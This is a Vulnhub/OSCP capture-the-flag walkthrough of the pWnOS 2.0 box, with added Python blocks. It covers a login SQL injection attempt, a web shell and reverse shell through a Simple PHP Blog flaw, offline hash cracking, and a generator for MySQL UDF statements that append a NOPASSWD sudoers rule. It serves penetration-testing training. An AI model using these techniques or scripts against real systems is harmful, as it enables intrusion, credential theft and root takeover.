Vulnhub virtual machine; OSCP prep box. A classic boot-to-root: enumeration leads to a blog application that is susceptible to a serious vulnerability, and that vulnerability gives the foothold on the box. Priv-esc was tricky; in the end the simplest solution turned out to be the hardest to figure out. A secondary priv-esc route is included as well.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use this information at your own risk.
By continuing to read, you acknowledge the aforementioned user risk/responsibilities.
Vulnhub Link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ File: pWnOS_v2.0.7z (Size: 286 MB) - Filetype: .vmdk (virtual hard drive)
Setup note: make sure the VM is on the 10.10.10.0/24 network.
Discover the VM on the network and ping it to confirm connectivity:
Target: 10.10.10.100, and we have connectivity.
Enumeration
Nmap scan:
We are looking at an SSH server and an HTTP server.
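To make the scan step concrete, here is an added example (not part of the original write-up, and not nmap itself) of what a service scan does underneath: a TCP connect scan with banner grabbing in standard-library Python. Against the target you would point it at 10.10.10.100; to stay self-contained it starts a constructed fake service on 127.0.0.1 that announces an SSH-style version string, which is how a scanner knows a port is SSH without ever authenticating, while an open HTTP port stays silent until it is sent a request.

```python
"""TCP connect scan with banner grabbing (added example, standard library only).

The local "fake SSH" listener is a constructed fixture so the block runs offline;
against a real target you would call scan(target_ip, range(1, 65536)).
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """Return (port, is_open, banner).

    SSH announces its version unprompted, so a bare recv() gets it; HTTP says
    nothing until it receives a request, so an open HTTP port yields "".
    """
    banner = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256)
            except socket.timeout:
                pass  # open, but the service is waiting for us to speak first
        return port, True, banner.decode("latin-1").strip()
    except OSError:  # refused, unreachable, or timed out on connect
        return port, False, ""


def scan(host, ports, timeout=1.0, workers=32):
    """Probe ports concurrently; returns {port: banner} for the open ones."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: probe(host, p, timeout), ports)
        return {port: banner for port, is_open, banner in results if is_open}


def serve_banner(banner):
    """Constructed fixture: listen on 127.0.0.1, send `banner` to each client,
    hang up. Returns the chosen port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(banner)

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def unused_port():
    """A port with no listener, to show what a closed port looks like."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    """Scan one open port (fake SSH) and one closed port on localhost."""
    open_port = serve_banner(b"SSH-2.0-ConstructedTestBanner_1.0\r\n")
    closed_port = unused_port()
    return open_port, closed_port, scan("127.0.0.1", [open_port, closed_port])


if __name__ == "__main__":
    open_port, closed_port, found = demo()
    for port in (open_port, closed_port):
        state = "open" if port in found else "closed"
        print(f"{port}/tcp {state} {found.get(port, '')}".rstrip())
```

A connect scan completes the three-way handshake, so it shows up in the target's logs; that is the trade-off against nmap's default SYN scan, which needs raw sockets and root.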
Options:
- Try to kick in the front door of SSH (brute force): unlikely to work.
- Browse the web server and investigate a way in.
Navigate to web-server:
Source:
A login page and a register page, and a possible user address, [email protected], in the page source.
Login page:
Attempt SQL injection on the login form, using the email address and ' or 3=3 -- :
No-go for injection.
Register new user: creating [email protected] / password.
Looks like we have to activate the user account.
Navigating to: http://10.10.10.100/activate.php?x=exec%40email.com&y=ab822cb907de2268500066b49acb17b4 (the y token is 32 hex characters, i.e. MD5-sized).
Activated. Now let's log in and look for a way into the box.
Login:
Seems to hang at this point…
Source:
Confirmed: it did not hang; we just landed on a very uninteresting page.
DirBuster: we need to find more directories.
Well, we found /blog.
Navigate to /blog
Source:
Web application identified as Simple PHP Blog 0.4.0.
Searching for vulnerabilities:
Both exploits jump off the page. Copy them locally with searchsploit's -m flag.
Checking out 1191.pl. The syntax we should try first, which should return the password file (the hash):
Result:
It successfully gave us the password hash. Let's see what else this exploit can do.
RCE
Upload cmd.php:
We now have a working cmd.php on the web server.
Quick test:
We get a response of www-data. Excellent.
Reverse the shell:
Set up a listener with Metasploit.
Tell the web server (through cmd.php) to fetch my reverse-shell .php file.
Successful download. Now let's request that file so the shell connects back to the listener.
Connection established.
Upgrade shell
Upgraded!
Now let's move on to privilege escalation.
Priv-Esc
First we need to enumerate the box a bit with some scripts.
wget the scripts onto the box.
Uploaded successfully to /dev/shm.
chmod them to 700.
Run the scripts.
The scripts flagged a few candidate priv-esc exploits:
Investigate the www folder.
Discovered a mysqli_connect.php, which contains database credentials.
Navigate to /var and notice another mysqli_connect.php.
Connect to the MySQL server:
Check for passwords:
Found password hashes to crack.
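The hashes that come out of the database are not decrypted but cracked: candidate words are hashed and compared. As an added example (not from the write-up; the actual hash formats on the box are not shown, so the algorithm is guessed from the digest length, which fits the unsalted MD5/SHA-1 that web apps of that era commonly stored), here is a small offline cracker over a constructed word list, including the capitalisation and numeric-suffix variants that later feed the password-reuse attempt against root. Salted or crypt()-style hashes (`$1$…`, `$6$…`) are skipped; those need john or hashcat.

```python
"""Offline cracking of unsalted hashes pulled from a database (added example).

Algorithm is guessed from digest length; the sample hashes and word list are
constructed for the demo, not values from the target.
"""
import hashlib
import itertools

ALGO_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def identify(digest):
    """Guess the digest algorithm from length; None if it is not plain hex."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None  # salted/crypt-style ($1$..., $6$...) or not a hash at all
    return ALGO_BY_HEX_LEN.get(len(digest))


def variants(word):
    """The mutations people actually apply to a base word when forced to
    'change' a password: capitalisation and a short numeric suffix."""
    for base, suffix in itertools.product((word, word.capitalize()), ("", "1", "123")):
        yield base + suffix


def crack(digest, wordlist):
    """Return (algorithm, plaintext) if a word or variant matches, else None."""
    algo = identify(digest)
    if algo is None:
        return None
    target = digest.strip().lower()
    for word in wordlist:
        for candidate in variants(word):
            if hashlib.new(algo, candidate.encode()).hexdigest() == target:
                return algo, candidate
    return None


def crack_all(hashes, wordlist):
    """Crack a {username: digest} mapping; uncracked entries map to None."""
    return {user: crack(digest, wordlist) for user, digest in hashes.items()}


# Constructed sample: two well-known digests plus one generated here.
SAMPLE_HASHES = {
    "alice": "5f4dcc3b5aa765d61d8327deb882cf99",           # md5("password")
    "bob": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",      # sha1("password")
    "carol": hashlib.sha256(b"Summer123").hexdigest(),      # a variant of "summer"
    "dave": "$6$constructed$notcrackablehere",             # crypt-style: skipped
}
SAMPLE_WORDLIST = ["letmein", "password", "summer", "admin"]


if __name__ == "__main__":
    for user, hit in crack_all(SAMPLE_HASHES, SAMPLE_WORDLIST).items():
        print(f"{user:6} {hit if hit else 'not cracked'}")
```

Anything recovered here goes straight onto the list of candidates for the database account, the blog admin and, as the write-up does at the end, root over SSH.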
Secondary Priv-Esc/Root
I wanted to try the udev and MySQL privilege escalations; while going down the udev road I was unsuccessful in escalating. When it came to the MySQL escalation I ran into some slight issues compiling, but I was able to create the file locally and then send it to the box. Below you will see my solution via MySQL.
Exploit: MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language: C
I downloaded locally and began inspecting the source:
While attempting to compile raptor_udf2.so, it would not compile on the box, so I compiled it locally and sent it to the box.
Error received:
After compiling locally and sending:
Log in to the MySQL server with the credentials found earlier:
Received an error that raptor_udf2.so did not exist at /usr/lib/raptor_udf2.so, so at this point I manually pushed the file to that directory.
In the mysql database:
We have successfully added www-data to the /etc/sudoers file, so we can just sudo bash to get a root shell.
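A worked example for this step, added here and not taken from the write-up or from exploit 1518: a generator for the statements that stage the UDF library through MySQL and register the function, with the shared object embedded as a hex literal instead of read with `load_file()`. The reason is the failure hit above: `load_file()` returns NULL rather than an error when mysqld cannot read the source path (file permissions, `secure_file_priv`, or an account without the FILE privilege), so `INTO DUMPFILE` writes nothing useful and `CREATE FUNCTION` then reports that /usr/lib/raptor_udf2.so does not exist. Pushing the file by hand, as done above, works when you already have a shell; inlining the bytes works when all you have is the SQL connection. Two caveats remain: the .so must be built for the target's architecture and libc (hence compiling locally and copying it over), and `INTO DUMPFILE` refuses to overwrite an existing file. The table, function and file names are the exploit's conventional ones and are assumed here; the ELF bytes in the demo are a constructed stand-in, not a working UDF; the NOPASSWD sudoers rule is an assumption about how www-data was added.

```python
"""MySQL UDF staging statements with the .so inlined (added example).

Everything here is SQL text generation; running it needs a MySQL account with
the FILE privilege on a mysqld that runs as root, which is the condition the
raptor_udf2 technique relies on.
"""

DUMP_PATH = "/usr/lib/raptor_udf2.so"   # where the write-up needed the file


def udf_loader_sql(so_bytes, dump_path=DUMP_PATH, func="do_system", table="foo"):
    """Return the statements that write `so_bytes` to `dump_path` through
    INTO DUMPFILE and register `func` from it.

    The shared object goes in as a hex literal (0x7f454c46...), so mysqld never
    has to read a file from disk; load_file() and its silent NULL are avoided.
    A few-KB library becomes a few-KB statement, well under max_allowed_packet.
    """
    if so_bytes[:4] != b"\x7fELF":
        raise ValueError("not an ELF shared object")
    soname = dump_path.rsplit("/", 1)[-1]
    return [
        "use mysql;",
        f"create table {table}(line blob);",
        f"insert into {table} values(0x{so_bytes.hex()});",
        # DUMPFILE writes the blob verbatim (no quoting, no newline); it refuses
        # to overwrite, so a stale file from an earlier attempt must be removed.
        f"select * from {table} into dumpfile '{dump_path}';",
        f"create function {func} returns integer soname '{soname}';",
        "select * from mysql.func;",   # confirm the function is registered
    ]


def sudoers_statement(func="do_system", user="www-data"):
    """The write-up's use of the UDF: give the web-server user passwordless
    sudo so that `sudo bash` yields root. NOPASSWD is assumed, since www-data
    has no password to type at the prompt."""
    rule = f"{user} ALL=(ALL) NOPASSWD: ALL"
    return f"select {func}('echo \"{rule}\" >> /etc/sudoers');"


def render_script(so_bytes, dump_path=DUMP_PATH, func="do_system",
                  table="foo", user="www-data"):
    """Full script, ready for `mysql -u <dbuser> -p < udf.sql`."""
    statements = udf_loader_sql(so_bytes, dump_path, func, table)
    statements.append(sudoers_statement(func, user))
    return "\n".join(statements)


if __name__ == "__main__":
    fake_so = b"\x7fELF" + bytes(12)   # constructed stand-in, not a real UDF
    print(render_script(fake_so))
```

The same statements are what a defender should hunt for: rows appearing in mysql.func, blob tables created in the mysql schema, and files written under the library directory by the mysqld process. Running mysqld as an unprivileged user, which has been the default for a long time, turns this whole chain into a shell as the mysql user rather than root.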
Root
Password reuse is always a possibility: attempt SSH as root with the passwords recovered so far.
Trying the two password variants is always worth a shot.
Bring me the root!
-exec